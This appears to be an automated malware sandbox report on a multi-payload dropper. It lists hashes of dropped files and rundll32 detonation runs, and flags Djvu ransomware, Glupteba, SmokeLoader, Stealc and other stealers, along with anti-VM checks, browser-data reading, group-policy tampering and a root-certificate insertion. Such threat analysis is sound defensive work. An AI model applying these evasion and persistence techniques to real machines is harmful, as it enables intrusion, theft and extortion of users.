| MD5 | 4be2d4ce33d1a48732453c838503503f |
| SHA1 | 53d7e7aa8cf4d9361ae2e6bf42979c6f30ed839c |
| SHA256 | 98c1653a2dfb458a8400ce5ad7b45c4d07b2b1d3c4ce00401a639ff297980c53 |
| SHA512 | 9e50a850a638b4f32ddfcd29e9ce2411298f8ee4ddd75ab9dcebf17be28ccebfd05cf38f0e5863981aa034f186de21cf7372c9c6b58d31c3933b3e964ac2a00f |
C:\Users\Admin\Documents\GuardFox\gJn_RF5KcsYNA2OkQkJ29HHO.exe
| MD5 | e101c352186923f4713f562f47c126cb |
| SHA1 | 259a5cd5523fcc243f4cf3b4f11b55378b82775f |
| SHA256 | 6e44010ae126a335e59f2486b0be831ec7f66ca2bc388c42d2519dbf824aef5c |
| SHA512 | e3d58e092c5467e123b751982cb0f77859e91f3f59a55c355e2ee5696697bdc93319823bb6632f2571f659ec53f9530f63d135bd00522fdb127e2fad777f46d4 |
C:\Users\Admin\AppData\Local\Temp\is-HBHE5.tmp\BfE8yx2fkiu6S97L10r7DVbH.tmp
| MD5 | 956fd09810c6edb78fa81f98b7c7ae0d |
| SHA1 | 94170850cacdcb1c46348bf28aa84e135b2abbab |
| SHA256 | b0f8ef03f6da9ade9149c1fde5233c5e0b6a29f2ff64e7506e96c79bbbf180be |
| SHA512 | de28d055c13aa0fbe2d514d26515f635b37b24f58496864cdd2e17d088fe7397a73577a6e82e540fa9058d971b7573c1f99eb4bcbd1977624a75fea85b299e4a |
C:\Users\Admin\Documents\GuardFox\ISlHKqSr3Ihf7Rtx6NjnELJr.exe
| MD5 | 8958c79e7857c27a58d9d87b10f98633 |
| SHA1 | ece3ebef6419ac56ffc5a032e541ea3103549344 |
| SHA256 | bc6c9d92bbb6a28e43379c95f99d8cb638cc3bf8d8ae3192d5fb246ac466ed4c |
| SHA512 | 56fa78326d26a6708276063ea14be8ad2d2248f4a3c815d4a115eefe33a9444e1fe6f8ca4b4eb304b4317537de406e0936eb11b0fe3bd852adeac6d00f0a8369 |
C:\Users\Admin\AppData\Local\DiskEject\diskeject.exe
| MD5 | 098a82d2ccbf542f50bbec97d5c65789 |
| SHA1 | 2ecc06428da1ca30443e778b72b61f39abe4c6a9 |
| SHA256 | d98a38ae38c90e81203b5de3c414027f7e860dde0cd65b031f3871c917b4520b |
| SHA512 | 1d92e7b7b97ba58047dc154e673bf6f730dae59ee5165ef60cb76a70eff5dd0beece0012187df2dc4de9692e48fb73dec0265603e38a261037a287c67df0ff3e |
memory/4472-945-0x00007FFAA3050000-0x00007FFAA310E000-memory.dmp
memory/1784-947-0x00000000052E0000-0x000000000553E000-memory.dmp
memory/4636-949-0x0000000000B60000-0x0000000001629000-memory.dmp
memory/2848-948-0x0000000000550000-0x0000000001049000-memory.dmp
memory/4636-956-0x0000000000B60000-0x0000000001629000-memory.dmp
memory/4208-963-0x0000000004F60000-0x0000000005136000-memory.dmp
memory/6100-966-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4636-965-0x0000000000B60000-0x0000000001629000-memory.dmp
memory/2848-970-0x0000000000550000-0x0000000001049000-memory.dmp
memory/5672-973-0x0000000010000000-0x0000000010562000-memory.dmp
memory/4636-969-0x0000000000B60000-0x0000000001629000-memory.dmp
memory/2848-979-0x0000000000550000-0x0000000001049000-memory.dmp
memory/4636-982-0x0000000000B60000-0x0000000001629000-memory.dmp
memory/984-981-0x0000000000400000-0x00000000004BC000-memory.dmp
memory/376-986-0x0000000001300000-0x0000000001301000-memory.dmp
memory/376-987-0x0000000001310000-0x0000000001311000-memory.dmp
memory/4636-989-0x0000000000B60000-0x0000000001629000-memory.dmp
memory/376-992-0x00000000014B0000-0x00000000014B1000-memory.dmp
memory/1104-993-0x0000000000400000-0x0000000000537000-memory.dmp
memory/3296-995-0x0000000005B40000-0x0000000005B50000-memory.dmp
memory/1272-1002-0x0000000000CD0000-0x00000000019D4000-memory.dmp
memory/376-990-0x0000000001320000-0x0000000001321000-memory.dmp
memory/1272-988-0x0000000000CD0000-0x00000000019D4000-memory.dmp
memory/3976-1008-0x0000000073910000-0x00000000740C0000-memory.dmp
memory/984-1013-0x0000000000540000-0x0000000000541000-memory.dmp
memory/1784-1015-0x00000000052D0000-0x00000000052E0000-memory.dmp
C:\Windows\System32\GroupPolicy\GPT.INI
| MD5 | 7cc972a3480ca0a4792dc3379a763572 |
| SHA1 | f72eb4124d24f06678052706c542340422307317 |
| SHA256 | 02ad5d151250848f2cc4b650a351505aa58ac13c50da207cc06295c123ddf5e5 |
| SHA512 | ff5f320356e59eaf8f2b7c5a2668541252221be2d9701006fcc64ce802e66eeaf6ecf316d925258eb12ee5b8b7df4f8da075e9524badc0024b55fae639d075b7 |
C:\Windows\System32\GroupPolicy\Machine\Registry.pol
| MD5 | cdfd60e717a44c2349b553e011958b85 |
| SHA1 | 431136102a6fb52a00e416964d4c27089155f73b |
| SHA256 | 0ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f |
| SHA512 | dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8 |
memory/2848-1025-0x00000000764E0000-0x00000000765D0000-memory.dmp
memory/2848-1029-0x00000000764E0000-0x00000000765D0000-memory.dmp
memory/4208-1024-0x0000000073910000-0x00000000740C0000-memory.dmp
memory/4636-984-0x0000000000B60000-0x0000000001629000-memory.dmp
memory/2848-983-0x0000000000550000-0x0000000001049000-memory.dmp
memory/2848-967-0x0000000000550000-0x0000000001049000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 8202a1cd02e7d69597995cabbe881a12 |
| SHA1 | 8858d9d934b7aa9330ee73de6c476acf19929ff6 |
| SHA256 | 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5 |
| SHA512 | 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 7ad07d3a9fac78737bccf804d9309424 |
| SHA1 | d4f9203c8464e854361003a708256784ab219f6b |
| SHA256 | 17687cb9f0a9fe686dd1a013e15e4568b4121ee6089b659d1a153767320b599c |
| SHA512 | 42a918827c465486758a4315de55f659db5dfb9e6b3327c45d992064aa83a1cd9a0e5177e8542ebea2c1bf3c00f16bcf915d951c1d38d267e258521e681a5ffe |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | 9da3b5b4a894c15d1aa6d3d5da27ee05 |
| SHA1 | 0d16e87371ab9401b56eb65a272347758566941b |
| SHA256 | 5d3ca1af142868ad96cffad80f8828660ef8fc2de231848cf76bd714ca68e37a |
| SHA512 | 8caa5f7d48de98fe9858cea339f6e08f8ef099a268f5fe644f91e2cf815be613bc59f1b48bff1e7413ecd57d3dc3db57c8cdd1a9987f4b5fd720fd96320a0d37 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | 645dee274ea761d6361613c34e97994c |
| SHA1 | e1363f1e4bdb5592a6294a78c7822d30276e7f2d |
| SHA256 | ed9e693a4c1224dac7ef73343a5f423d92379ceb4a7263538803d071e9027a76 |
| SHA512 | a2df7b7abad222c01eced9ce265cceea497cb0bfd193ee2940b3c5b9293f594d65842408fb44b9df3f2d5c176a6abc1aa232e7eb2a95e108f3437ce1d3d309e1 |
C:\Users\Admin\AppData\Local\Temp\7zS35FF.tmp\Install.exe
| MD5 | 916a9967455fd4fd20b9b39ce4668dc6 |
| SHA1 | 4e31f16ff3c796b68336a0b40975c3d7cba83c88 |
| SHA256 | 56593bc30925e82424052fae92e4febd3e051657abee74016d1cf46afd2ecdd3 |
| SHA512 | 225b106e20481ffaefd200dbe08b952bfd4d26b2320b272dab4b2041cf59fb3d959ebf5daa201fcbc886ce2e024a7abdcefa03667d0224d3eea381b37b31f1fc |
memory/2848-954-0x0000000000550000-0x0000000001049000-memory.dmp
memory/6076-952-0x0000000000400000-0x0000000000647000-memory.dmp
memory/6068-946-0x0000000000400000-0x0000000000574000-memory.dmp
memory/2848-941-0x0000000000550000-0x0000000001049000-memory.dmp
memory/1756-944-0x0000000005670000-0x0000000005680000-memory.dmp
memory/6084-937-0x0000000000400000-0x0000000000D1C000-memory.dmp
C:\Users\Admin\Documents\GuardFox\0Q8uyAZHlmlFjtnqMRSKNaWR.exe
| MD5 | da930cadf742e9b7d730b23a232fe2c7 |
| SHA1 | fc5cf9656d29bcb58bc75f636d762441f7124232 |
| SHA256 | 1a1c3b89eb590651d5a46cb22b5a86e090502698cbad08dce82f1f6d3819fbd2 |
| SHA512 | 5a40c0e3bdd1407ce6455d2b76d92898c227bb21555abd4e5fa5ac240bfc3722770a11b51436295e71d192650e3445c946e5e2d268358156f4a833c97f139ec7 |
memory/6068-779-0x00000000006E0000-0x00000000006E2000-memory.dmp
C:\Users\Admin\Documents\GuardFox\ISlHKqSr3Ihf7Rtx6NjnELJr.exe
| MD5 | 4c2ef478ccd6e5f6ca8a28400342dbc4 |
| SHA1 | de26db6c1478331708bea7191545afc718e526e0 |
| SHA256 | d24751ab32fae391612ef0ccd33b5a85d338893aa69f72b3c05b82331d9f4f29 |
| SHA512 | 1957ba044e0f900301214b6e07540fd946164816d3d684b701e89a3e5477c210d96a627919bd44287ce83392c015d4d626080673d1ecd5400b930a7db985493f |
memory/6068-732-0x0000000002290000-0x00000000022DB000-memory.dmp
memory/6136-731-0x0000000000660000-0x0000000000760000-memory.dmp
memory/6068-724-0x0000000000400000-0x0000000000574000-memory.dmp
memory/6100-722-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\Documents\GuardFox\xUQkYU62TJdbos0qqRtjjjOA.exe
| MD5 | 644d71f97dd3e80a9af1389702e77674 |
| SHA1 | af2ecc9595cc8e8e021af4a51d8b306cd56085b1 |
| SHA256 | be70121f2bff99094a4d0bb710f29b8007deaa3c5964502710cabd819cad1306 |
| SHA512 | 3988423a0e8c7679c575c4d3ae6f963d5922039a68279bdab38c61d53250172c61b37b1bb33ddf47dacd8c95022600467003e209548889b97655d1dc9e38fcad |
memory/4472-706-0x00007FFAA43F0000-0x00007FFAA45E5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS35FF.tmp\Install.exe
| MD5 | fd04e762cc4766fa84ebe66152115fc5 |
| SHA1 | 45698945a40defcc7c721d58f067355f6d5046f3 |
| SHA256 | fed838bd03560649f5299a769ed77ffef470c69cc6ddd8dc7ebfc7ef581f1096 |
| SHA512 | 70089a9295b9a7f8d3b5ecf840f88e35b6c4a50ca5860e518369981b69bdedba7ea31c78b594145dc9101af298d64c70dc4e969ee0679238edb4db9a115be33a |
C:\Users\Admin\Documents\GuardFox\s0le_fm_4gWqZWQK2MkxHiM0.exe
| MD5 | e1eecbef9967f158adc28f4962bac436 |
| SHA1 | e441f1947d75a202f9c1a63e2a5ee7110f9d5cc5 |
| SHA256 | 14d02817dc75157ab10b9c44897cb4dcd01dd766043f202914f52cd9f86c3628 |
| SHA512 | 5cf7a5394d4b742edda1f27b9a009ede82c29202a4d4ba74d361e53a4bfab95e662147118f2829eafdcf24c3ac604abf0e1fe55260aa6496648c06888d1cdc38 |
C:\Users\Admin\Documents\GuardFox\OBUsg_TT5INyXWrn2bwJe6rY.exe
| MD5 | dcae30e7ec4143df978db719a241bb2e |
| SHA1 | 4ef179df5a76049966f473dfd47348072cf532a8 |
| SHA256 | 5482b899f8ca9a629221e805752ef13ddb2331c97d0d5445b582df7481755a17 |
| SHA512 | 2cb587060d7fbbef623a24ff3ca8c557e70b3817edcf0c4a48cbb859d489735ec8e0ea548170120d6ae353409828d27cdf9e1434dcfb7f023326b0dca6229e1c |
C:\Users\Admin\Documents\GuardFox\gJn_RF5KcsYNA2OkQkJ29HHO.exe
| MD5 | 083f867f92435e217c7d959123687fb4 |
| SHA1 | d4c7ab095118639c6fea1d69a98ff176852f5ac3 |
| SHA256 | 90acd520c0672a8d46d2b2c376ca6098f08137a7379f461a82acca27ab07fc96 |
| SHA512 | ef85355e72ad1b49d5c4a569266e186692f3a5459535476e082dc1a45fc425d7d48104e3e38dd8475e4d7d2e3c82347622bd78614acc0c59da2be47b338a321f |
C:\Users\Admin\Documents\GuardFox\Ew0D6wCwNOM8qo1gbXAuFx0N.exe
| MD5 | eaa10ae5c43bc3acf4245b22d4b70050 |
| SHA1 | d6a2598daee7c5db8398915b0736953060dbca39 |
| SHA256 | bfbb67a72c2e129b59e06ab2e5ac44b712bbc90f030236a8ee2a47ae90717755 |
| SHA512 | 13b01f7c79409967db6350a5c007af4f764721482be730b26d9482c042fb2bbea72dd0ef963ca8ffe0be405661b3e2f5e7dc3b726b75d9b27021693c20be58bf |
memory/2848-1058-0x00000000764E0000-0x00000000765D0000-memory.dmp
memory/4636-1065-0x00000000764E0000-0x00000000765D0000-memory.dmp
memory/2848-1066-0x00000000764E0000-0x00000000765D0000-memory.dmp
memory/4636-1064-0x00000000764E0000-0x00000000765D0000-memory.dmp
C:\Windows\system32\GroupPolicy\gpt.ini
| MD5 | a62ce44a33f1c05fc2d340ea0ca118a4 |
| SHA1 | 1f03eb4716015528f3de7f7674532c1345b2717d |
| SHA256 | 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a |
| SHA512 | 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732 |
C:\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
C:\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
C:\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll
| MD5 | 544cd51a596619b78e9b54b70088307d |
| SHA1 | 4769ddd2dbc1dc44b758964ed0bd231b85880b65 |
| SHA256 | dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd |
| SHA512 | f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | ea8bfa7b3cc68a54ba3bac1187004e84 |
| SHA1 | 8b2a48f8a4522ebe15ab36c7652d4ec0e0483d89 |
| SHA256 | 54b6c1da797b6476204df9b9e57b1e8bdafac7f01a48810f35d393fe1393f304 |
| SHA512 | c3945c56ba032bcda30c5875284ed8e11ce5b709d7df0bff5184d5920c75282f72507dcf75bb9ef04c35eb38dcd108824dc24ca52819a346acbf0d3a98a296b0 |
\??\pipe\crashpad_5640_GYOSEGBVKEPGSCAG
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\ProgramData\Are.docx
| MD5 | a33e5b189842c5867f46566bdbf7a095 |
| SHA1 | e1c06359f6a76da90d19e8fd95e79c832edb3196 |
| SHA256 | 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454 |
| SHA512 | f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m4udbs1e.qvs.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
| MD5 | a5ce3aba68bdb438e98b1d0c70a3d95c |
| SHA1 | 013f5aa9057bf0b3c0c24824de9d075434501354 |
| SHA256 | 9b860be98a046ea97a7f67b006e0b1bc9ab7731dd2a0f3a9fd3d710f6c43278a |
| SHA512 | 7446f1256873b51a59b9d2d3498cef5a41dbce55864c2a5fb8cb7d25f7d6e6d8ea249d551a45b75d99b1ad0d6fb4b5e4544e5ca77bcd627717d6598b5f566a79 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-02-18 21:55
Reported
2024-02-18 22:00
Platform
win7-20231215-es
Max time kernel
119s
Max time network
137s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2756 -s 228
Network
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-02-18 21:55
Reported
2024-02-18 22:00
Platform
win7-20231215-es
Max time kernel
120s
Max time network
137s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Resource\Locals\x64\AdonisUI.ClassicTheme.dll,#1
Network
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-02-18 21:55
Reported
2024-02-18 21:59
Platform
win10v2004-20231215-es
Max time kernel
137s
Max time network
164s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Resource\Locals\x64\AdonisUI.ClassicTheme.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.143.182.52.in-addr.arpa | udp |
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-02-18 21:55
Reported
2024-02-18 21:59
Platform
win7-20231215-es
Max time kernel
119s
Max time network
128s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Resource\Locals\x64\AdonisUI.dll,#1
Network
Files
Analysis: behavioral14
Detonation Overview
Submitted
2024-02-18 21:55
Reported
2024-02-18 21:59
Platform
win10v2004-20231215-es
Max time kernel
138s
Max time network
164s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Resource\Locals\x64\AdonisUI.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
Files
Analysis: behavioral19
Detonation Overview
Submitted
2024-02-18 21:55
Reported
2024-02-18 21:59
Platform
win7-20231215-es
Max time kernel
118s
Max time network
123s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1972 wrote to memory of 1988 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1972 wrote to memory of 1988 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1972 wrote to memory of 1988 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1972 wrote to memory of 1988 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1972 wrote to memory of 1988 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1972 wrote to memory of 1988 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1972 wrote to memory of 1988 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Resource\Locals\x86\SQLite.Interop.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Resource\Locals\x86\SQLite.Interop.dll,#1
Network
Files
Analysis: behavioral23
Detonation Overview
Submitted
2024-02-18 21:55
Reported
2024-02-18 22:00
Platform
win7-20231215-es
Max time kernel
55s
Max time network
172s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RisePro
SmokeLoader
Stealc
ZGRat
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads user/profile data of web browsers
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Documents\GuardFox\Jhv610CCO7ohTiXzS8CCeWKd.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Documents\GuardFox\0Q8uyAZHlmlFjtnqMRSKNaWR.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca